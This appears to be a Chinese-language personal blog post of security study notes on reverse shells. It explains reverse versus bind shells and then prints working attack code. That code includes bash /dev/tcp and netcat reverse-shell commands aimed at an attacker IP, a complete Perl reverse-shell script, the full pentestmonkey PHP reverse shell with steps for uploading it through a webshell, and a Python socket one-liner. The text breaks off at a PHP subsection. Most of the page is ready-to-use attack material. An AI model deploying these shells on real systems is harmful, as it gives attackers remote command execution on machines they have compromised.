<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8" />
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    反弹shell |  w&#39; Blog
  </title>
  <meta name="generator" content="hexo-theme-yilia-plus">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/css/main.css">

  
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
  
  

  

<link rel="alternate" href="/atom.xml" title="w' Blog" type="application/atom+xml">
</head>

</html>

<body>
  <div id="app">
    <main class="content">
      <section class="outer">
  <article id="post-反弹shell" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  反弹shell
</h1>
  

    </header>
    

    
    <div class="article-meta">
      <a href="/2020/03/23/%E5%8F%8D%E5%BC%B9shell/" class="article-date">
  <time datetime="2020-03-23T13:04:56.000Z" itemprop="datePublished">2020-03-23</time>
</a>
      
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
  </div>

      
      
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">2.3k字</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">12分钟</span>
        </span>
    </span>
</div>

      
    </div>
    

    
    
    <div class="tocbot"></div>





    

    
    <div class="article-entry" itemprop="articleBody">
      


      

      
      <h1 id="反弹SHELL"><a href="#反弹SHELL" class="headerlink" title="反弹SHELL"></a>反弹SHELL</h1><h2 id="一-基础"><a href="#一-基础" class="headerlink" title="一.基础"></a>一.基础</h2><h3 id="1-反弹shell与正向shell"><a href="#1-反弹shell与正向shell" class="headerlink" title="1.反弹shell与正向shell"></a>1.反弹shell与正向shell</h3><h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><ul>
<li>由目标机发起的连接，攻击者被动监听端口</li>
<li>通过用于目标机存在防火墙限制、权限不足、端口占用等问题</li>
<li>常用于目标机在内网，攻击机在外网</li>
</ul>
<h4 id="正向shell"><a href="#正向shell" class="headerlink" title="正向shell"></a>正向shell</h4><ul>
<li>由攻击机发起的连接，目标机被动监听端口</li>
<li>通常用于目标机无限制</li>
<li>常用于目标机在外网，攻击机在内网</li>
</ul>
<h3 id="2-反弹shell的原理"><a href="#2-反弹shell的原理" class="headerlink" title="2.反弹shell的原理"></a>2.反弹shell的原理</h3><ul>
<li><p>以linux下通过bash反弹shell为例</p>
<ul>
<li>操作<ul>
<li>攻击机使用nc监听本地端口1234：<code>nc -nlvp 1234</code></li>
<li>Linux目标机执行：<code>bash -i &gt;&amp; /dev/tcp/攻击机的ip/1234 0&gt;&amp;1(或者2)</code></li>
</ul>
</li>
<li>原理<ul>
<li><code>bash -i</code>:在本地打开一个bash终端</li>
<li><code>/dev/tcp/ip/port</code>:<code>/dev/tcp</code>是linux中的一个特殊设备文件，对这个文件的读写就相当于建立一个socket通信</li>
<li><code>bash -i &gt;&amp; /dev/tcp/ip/port</code>:本地bash的标准输出和标准错误输出重定向到远程开启监听的主机，即在本地输入的命令得到输出的结果（无论对错）都显示在远程开启监听的主机上</li>
<li><code>0&gt;&amp;1</code>与<code>0&gt;&amp;2</code>:标准输入复制到标准输出与标准错误输出，效果一样，因为此时标准输出(1)和标准错误输出(2)都已经重定向到/dev/tcp/ip/port上了，也就是本地输入由远程监听的主机来输入了</li>
</ul>
</li>
</ul>
</li>
</ul>
<hr>
<h2 id="二-反弹shell的使用"><a href="#二-反弹shell的使用" class="headerlink" title="二.反弹shell的使用"></a>二.反弹shell的使用</h2><p><strong>以下操作前提：下面的内容都是基于获取目标机webshell后的操作，也可以用于命令注入获得反弹shell；</strong><br><em>对于linux下一句话木马获得的webshell提权不好操作，建议使用终端shell</em><br>使用python对非标准化的终端进行优化：<code>python -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39;</code></p>
<h3 id="1-nc工具"><a href="#1-nc工具" class="headerlink" title="1.nc工具"></a>1.nc工具</h3><p><strong>攻击机和目标机都使用nc工具</strong></p>
<ul>
<li>nc（netcat）被誉为网络安全届的’瑞士军刀’</li>
<li>nc -h 查看命令帮助信息  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># nc -h</span></span><br><span class="line">[v1.10-41.1]</span><br><span class="line">connect to somewhere:	nc [-options] hostname port[s] [ports] ... </span><br><span class="line">listen <span class="keyword">for</span> inbound:	nc -l -p port [-options] [hostname] [port]</span><br><span class="line">options:</span><br><span class="line">    -c shell commands	as `-e<span class="string">'; use /bin/sh to exec [dangerous!!]</span></span><br><span class="line"><span class="string">    -e filename		program to exec after connect [dangerous!!]</span></span><br><span class="line"><span class="string">    -b			allow broadcasts</span></span><br><span class="line"><span class="string">    -g gateway		source-routing hop point[s], up to 8</span></span><br><span class="line"><span class="string">    -G num			source-routing pointer: 4, 8, 12, ...</span></span><br><span class="line"><span class="string">    -h			this cruft</span></span><br><span class="line"><span class="string">    -i secs			delay interval for lines sent, ports scanned</span></span><br><span class="line"><span class="string">        -k                      set keepalive option on socket</span></span><br><span class="line"><span class="string">    -l			listen mode, for inbound connects</span></span><br><span class="line"><span class="string">    -n			numeric-only IP addresses, no DNS</span></span><br><span class="line"><span class="string">    -o file			hex dump of traffic</span></span><br><span class="line"><span class="string">    -p port			local port number</span></span><br><span class="line"><span class="string">    -r			randomize local and remote ports</span></span><br><span class="line"><span class="string">    -q secs			quit after EOF on stdin and delay of secs</span></span><br><span class="line"><span class="string">    -s addr			local source address</span></span><br><span class="line"><span class="string">    -T tos			set Type Of Service</span></span><br><span class="line"><span class="string">    -t			answer TELNET negotiation</span></span><br><span class="line"><span class="string">    -u			UDP mode</span></span><br><span class="line"><span class="string">    -v			verbose [use twice to be more verbose]</span></span><br><span class="line"><span class="string">    -w secs			timeout for connects and final net reads</span></span><br><span class="line"><span class="string">    -C			Send CRLF as line-ending</span></span><br><span class="line"><span class="string">    -z			zero-I/O mode [used for scanning]</span></span><br><span class="line"><span class="string">port numbers can be individual or ranges: lo-hi [inclusive];</span></span><br><span class="line"><span class="string">hyphens in port names must be backslash escaped (e.g. '</span>ftp\-data<span class="string">').</span></span><br></pre></td></tr></table></figure>
<ul>
<li>-n 指定ip，不用dns域名解析，加快速度</li>
<li>-l 监听模式，用于入站连接</li>
<li>-v 显示详细信息，-vv 更详细</li>
<li>-p 本地监听端口号</li>
<li>-r 任意指定本地及远程端口</li>
<li>-t 以telnet形式交互</li>
<li>-e 连接后指定执行的程序,windows使用cmd.exe,Linux使用/bin/bash </li>
</ul>
</li>
<li>正向连接<ul>
<li>攻击机主动连接目标机，适用于攻击者在内网，目标机在外网<ol>
<li>目标机上执行监听，将bash发送出去：<code>nc -lvvp 1234 -t -e /bin/bash</code></li>
<li>攻击者连接目标机：<code>nc 目标机ip 1234</code></li>
</ol>
</li>
</ul>
</li>
<li>反向连接<ul>
<li>攻击者监听，等待目标机连接<ol>
<li>攻击者监听：<code>nc -nlvp 1234</code></li>
<li>目标机连接：<code>nc -e /bin/bash 攻击者ip 1234</code></li>
</ol>
</li>
<li>如果目标机上nc不支持-e选项（linux中使用管道符）<ol>
<li>攻击机上监听： <code>nc -nlvp 1234</code><pre><code>`nc -nlvp 4321`</code></pre></li>
<li>目标机上连接：<code>nc 攻击机ip 1234|/bin/bash|nc 攻击机ip 4321</code></li>
<li>然后在攻击机上监听1234的终端执行命令，攻击机监听4321的终端上将会输出目标机的执行结果</li>
</ol>
</li>
</ul>
</li>
</ul>
<h3 id="2-perl脚本工具"><a href="#2-perl脚本工具" class="headerlink" title="2.perl脚本工具"></a>2.perl脚本工具</h3><p><strong>适用于目标机为Linux但无nc工具</strong></p>
<ol>
<li>上传ft.pl脚本<br>脚本内容<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/perl -w    </span></span><br><span class="line"><span class="comment">#    </span></span><br><span class="line"></span><br><span class="line"><span class="keyword">use</span> strict;    </span><br><span class="line"><span class="keyword">use</span> Socket;    </span><br><span class="line"><span class="keyword">use</span> IO::Handle;    </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($#ARGV+<span class="number">1</span> != <span class="number">2</span>)&#123;    </span><br><span class="line">    <span class="keyword">print</span> <span class="string">"$#ARGV $0 Remote_IP Remote_Port \n"</span>;    </span><br><span class="line">        <span class="keyword">exit</span> <span class="number">1</span>;    </span><br><span class="line">&#125;    </span><br><span class="line"></span><br><span class="line"><span class="keyword">my</span> $remote_ip = $ARGV[<span class="number">0</span>];    </span><br><span class="line"><span class="keyword">my</span> $remote_port = $ARGV[<span class="number">1</span>];    </span><br><span class="line"></span><br><span class="line"><span class="keyword">my</span> $proto = <span class="keyword">getprotobyname</span>(<span class="string">"tcp"</span>);    </span><br><span class="line"><span class="keyword">my</span> $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));    </span><br><span class="line"></span><br><span class="line"><span class="keyword">my</span> $shell = <span class="string">'/bin/bash -i'</span>;    </span><br><span class="line"></span><br><span class="line"><span class="keyword">socket</span>(SOCK, AF_INET, SOCK_STREAM, $proto);    </span><br><span class="line"></span><br><span class="line">STDOUT-&gt;autoflush(<span class="number">1</span>);    </span><br><span class="line">SOCK-&gt;autoflush(<span class="number">1</span>);    </span><br><span class="line"></span><br><span class="line"><span class="keyword">connect</span>(SOCK,$pack_addr) <span class="keyword">or</span> <span class="keyword">die</span> <span class="string">"can not connect:$!"</span>;    </span><br><span class="line"></span><br><span class="line"><span class="keyword">open</span> STDIN, <span class="string">"&lt;&amp;SOCK"</span>;    </span><br><span class="line"><span class="keyword">open</span> STDOUT, <span class="string">"&gt;&amp;SOCK"</span>;    </span><br><span class="line"><span class="keyword">open</span> STDERR, <span class="string">"&gt;&amp;SOCK"</span>;    </span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">"Enjoy the shell.\n"</span>;              </span><br><span class="line"></span><br><span class="line"><span class="keyword">system</span>($shell);    </span><br><span class="line"><span class="keyword">close</span> SOCK;    </span><br><span class="line"></span><br><span class="line"><span class="keyword">exit</span> <span class="number">0</span>;</span><br></pre></td></tr></table></figure></li>
<li>加上执行权限:<code>chmod u+x ft.pl</code></li>
<li>攻击机监听：<code>nc -nlvp 1234</code></li>
<li>目标机上执行脚本:<code>./ft.pl 攻击机ip 1234</code></li>
</ol>
<h3 id="3-php-reverse-shell-php"><a href="#3-php-reverse-shell-php" class="headerlink" title="3.php-reverse-shell.php"></a>3.php-reverse-shell.php</h3><ul>
<li><p>脚本源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// php-reverse-shell - A Reverse Shell implementation in PHP</span></span><br><span class="line"><span class="comment">// Copyright (C) 2007 pentestmonkey@pentestmonkey.net</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// This tool may be used for legal purposes only.  Users take full responsibility</span></span><br><span class="line"><span class="comment">// for any actions performed using this tool.  The author accepts no liability</span></span><br><span class="line"><span class="comment">// for damage caused by this tool.  If these terms are not acceptable to you, then</span></span><br><span class="line"><span class="comment">// do not use this tool.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// In all other respects the GPL version 2 applies:</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// This program is free software; you can redistribute it and/or modify</span></span><br><span class="line"><span class="comment">// it under the terms of the GNU General Public License version 2 as</span></span><br><span class="line"><span class="comment">// published by the Free Software Foundation.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// This program is distributed in the hope that it will be useful,</span></span><br><span class="line"><span class="comment">// but WITHOUT ANY WARRANTY; without even the implied warranty of</span></span><br><span class="line"><span class="comment">// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the</span></span><br><span class="line"><span class="comment">// GNU General Public License for more details.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// You should have received a copy of the GNU General Public License along</span></span><br><span class="line"><span class="comment">// with this program; if not, write to the Free Software Foundation, Inc.,</span></span><br><span class="line"><span class="comment">// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// This tool may be used for legal purposes only.  Users take full responsibility</span></span><br><span class="line"><span class="comment">// for any actions performed using this tool.  If these terms are not acceptable to</span></span><br><span class="line"><span class="comment">// you, then do not use this tool.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// You are encouraged to send comments, improvements or suggestions to</span></span><br><span class="line"><span class="comment">// me at pentestmonkey@pentestmonkey.net</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Description</span></span><br><span class="line"><span class="comment">// -----------</span></span><br><span class="line"><span class="comment">// This script will make an outbound TCP connection to a hardcoded IP and port.</span></span><br><span class="line"><span class="comment">// The recipient will be given a shell running as the current user (apache normally).</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Limitations</span></span><br><span class="line"><span class="comment">// -----------</span></span><br><span class="line"><span class="comment">// proc_open and stream_set_blocking require PHP version 4.3+, or 5+</span></span><br><span class="line"><span class="comment">// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.</span></span><br><span class="line"><span class="comment">// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Usage</span></span><br><span class="line"><span class="comment">// -----</span></span><br><span class="line"><span class="comment">// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.</span></span><br><span class="line"></span><br><span class="line">set_time_limit (<span class="number">0</span>);</span><br><span class="line">$VERSION = <span class="string">"1.0"</span>;</span><br><span class="line">$ip = <span class="string">'攻击机的ip'</span>;  <span class="comment">// CHANGE THIS</span></span><br><span class="line">$port = 攻击机监听的端口;       <span class="comment">// CHANGE THIS</span></span><br><span class="line">$chunk_size = <span class="number">1400</span>;</span><br><span class="line">$write_a = <span class="keyword">null</span>;</span><br><span class="line">$error_a = <span class="keyword">null</span>;</span><br><span class="line">$shell = <span class="string">'uname -a; w; id; /bin/sh -i'</span>;</span><br><span class="line">$daemon = <span class="number">0</span>;</span><br><span class="line">$debug = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Daemonise ourself if possible to avoid zombies later</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// pcntl_fork is hardly ever available, but will allow us to daemonise</span></span><br><span class="line"><span class="comment">// our php process and avoid zombies.  Worth a try...</span></span><br><span class="line"><span class="keyword">if</span> (function_exists(<span class="string">'pcntl_fork'</span>)) &#123;</span><br><span class="line">	<span class="comment">// Fork and have the parent process exit</span></span><br><span class="line">	$pid = pcntl_fork();</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">if</span> ($pid == <span class="number">-1</span>) &#123;</span><br><span class="line">		printit(<span class="string">"ERROR: Can't fork"</span>);</span><br><span class="line">		<span class="keyword">exit</span>(<span class="number">1</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">if</span> ($pid) &#123;</span><br><span class="line">		<span class="keyword">exit</span>(<span class="number">0</span>);  <span class="comment">// Parent exits</span></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Make the current process a session leader</span></span><br><span class="line">	<span class="comment">// Will only succeed if we forked</span></span><br><span class="line">	<span class="keyword">if</span> (posix_setsid() == <span class="number">-1</span>) &#123;</span><br><span class="line">		printit(<span class="string">"Error: Can't setsid()"</span>);</span><br><span class="line">		<span class="keyword">exit</span>(<span class="number">1</span>);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	$daemon = <span class="number">1</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">	printit(<span class="string">"WARNING: Failed to daemonise.  This is quite common and not fatal."</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Change to a safe directory</span></span><br><span class="line">chdir(<span class="string">"/"</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Remove any umask we inherited</span></span><br><span class="line">umask(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Do the reverse shell...</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Open reverse connection</span></span><br><span class="line">$sock = fsockopen($ip, $port, $errno, $errstr, <span class="number">30</span>);</span><br><span class="line"><span class="keyword">if</span> (!$sock) &#123;</span><br><span class="line">	printit(<span class="string">"$errstr ($errno)"</span>);</span><br><span class="line">	<span class="keyword">exit</span>(<span class="number">1</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Spawn shell process</span></span><br><span class="line">$descriptorspec = <span class="keyword">array</span>(</span><br><span class="line">   <span class="number">0</span> =&gt; <span class="keyword">array</span>(<span class="string">"pipe"</span>, <span class="string">"r"</span>),  <span class="comment">// stdin is a pipe that the child will read from</span></span><br><span class="line">   <span class="number">1</span> =&gt; <span class="keyword">array</span>(<span class="string">"pipe"</span>, <span class="string">"w"</span>),  <span class="comment">// stdout is a pipe that the child will write to</span></span><br><span class="line">   <span class="number">2</span> =&gt; <span class="keyword">array</span>(<span class="string">"pipe"</span>, <span class="string">"w"</span>)   <span class="comment">// stderr is a pipe that the child will write to</span></span><br><span class="line">);</span><br><span class="line"></span><br><span class="line">$process = proc_open($shell, $descriptorspec, $pipes);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!is_resource($process)) &#123;</span><br><span class="line">	printit(<span class="string">"ERROR: Can't spawn shell"</span>);</span><br><span class="line">	<span class="keyword">exit</span>(<span class="number">1</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Set everything to non-blocking</span></span><br><span class="line"><span class="comment">// Reason: Occsionally reads will block, even though stream_select tells us they won't</span></span><br><span class="line">stream_set_blocking($pipes[<span class="number">0</span>], <span class="number">0</span>);</span><br><span class="line">stream_set_blocking($pipes[<span class="number">1</span>], <span class="number">0</span>);</span><br><span class="line">stream_set_blocking($pipes[<span class="number">2</span>], <span class="number">0</span>);</span><br><span class="line">stream_set_blocking($sock, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">printit(<span class="string">"Successfully opened reverse shell to $ip:$port"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> (<span class="number">1</span>) &#123;</span><br><span class="line">	<span class="comment">// Check for end of TCP connection</span></span><br><span class="line">	<span class="keyword">if</span> (feof($sock)) &#123;</span><br><span class="line">		printit(<span class="string">"ERROR: Shell connection terminated"</span>);</span><br><span class="line">		<span class="keyword">break</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Check for end of STDOUT</span></span><br><span class="line">	<span class="keyword">if</span> (feof($pipes[<span class="number">1</span>])) &#123;</span><br><span class="line">		printit(<span class="string">"ERROR: Shell process terminated"</span>);</span><br><span class="line">		<span class="keyword">break</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Wait until a command is end down $sock, or some</span></span><br><span class="line">	<span class="comment">// command output is available on STDOUT or STDERR</span></span><br><span class="line">	$read_a = <span class="keyword">array</span>($sock, $pipes[<span class="number">1</span>], $pipes[<span class="number">2</span>]);</span><br><span class="line">	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, <span class="keyword">null</span>);</span><br><span class="line"></span><br><span class="line">	<span class="comment">// If we can read from the TCP socket, send</span></span><br><span class="line">	<span class="comment">// data to process's STDIN</span></span><br><span class="line">	<span class="keyword">if</span> (in_array($sock, $read_a)) &#123;</span><br><span class="line">		<span class="keyword">if</span> ($debug) printit(<span class="string">"SOCK READ"</span>);</span><br><span class="line">		$input = fread($sock, $chunk_size);</span><br><span class="line">		<span class="keyword">if</span> ($debug) printit(<span class="string">"SOCK: $input"</span>);</span><br><span class="line">		fwrite($pipes[<span class="number">0</span>], $input);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// If we can read from the process's STDOUT</span></span><br><span class="line">	<span class="comment">// send data down tcp connection</span></span><br><span class="line">	<span class="keyword">if</span> (in_array($pipes[<span class="number">1</span>], $read_a)) &#123;</span><br><span class="line">		<span class="keyword">if</span> ($debug) printit(<span class="string">"STDOUT READ"</span>);</span><br><span class="line">		$input = fread($pipes[<span class="number">1</span>], $chunk_size);</span><br><span class="line">		<span class="keyword">if</span> ($debug) printit(<span class="string">"STDOUT: $input"</span>);</span><br><span class="line">		fwrite($sock, $input);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// If we can read from the process's STDERR</span></span><br><span class="line">	<span class="comment">// send data down tcp connection</span></span><br><span class="line">	<span class="keyword">if</span> (in_array($pipes[<span class="number">2</span>], $read_a)) &#123;</span><br><span class="line">		<span class="keyword">if</span> ($debug) printit(<span class="string">"STDERR READ"</span>);</span><br><span class="line">		$input = fread($pipes[<span class="number">2</span>], $chunk_size);</span><br><span class="line">		<span class="keyword">if</span> ($debug) printit(<span class="string">"STDERR: $input"</span>);</span><br><span class="line">		fwrite($sock, $input);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">fclose($sock);</span><br><span class="line">fclose($pipes[<span class="number">0</span>]);</span><br><span class="line">fclose($pipes[<span class="number">1</span>]);</span><br><span class="line">fclose($pipes[<span class="number">2</span>]);</span><br><span class="line">proc_close($process);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Like print, but does nothing if we've daemonised ourself</span></span><br><span class="line"><span class="comment">// (I can't figure out how to redirect STDOUT like a proper daemon)</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">printit</span> <span class="params">($string)</span> </span>&#123;</span><br><span class="line">	<span class="keyword">if</span> (!$daemon) &#123;</span><br><span class="line">		<span class="keyword">print</span> <span class="string">"$string\n"</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>使用方法</p>
<ul>
<li>1.上传脚本到目标机(注意修改ip和port参数)</li>
<li>2.在攻击机上执行监听:<code>nc -nlvp port</code></li>
<li>3.在浏览器中访问脚本上传的页面</li>
</ul>
</li>
</ul>
<h3 id="4-各类反弹脚本-目标机命令行下直接输入"><a href="#4-各类反弹脚本-目标机命令行下直接输入" class="headerlink" title="4.各类反弹脚本(目标机命令行下直接输入)"></a>4.各类反弹脚本(目标机命令行下直接输入)</h3><ul>
<li><p>python脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &quot;import os,socket,subprocess;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#39;ip&#39;,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&#39;&#x2F;bin&#x2F;bash&#39;,&#39;-i&#39;]);&quot;</span><br></pre></td></tr></table></figure>
</li>
<li><p>php脚本</p>
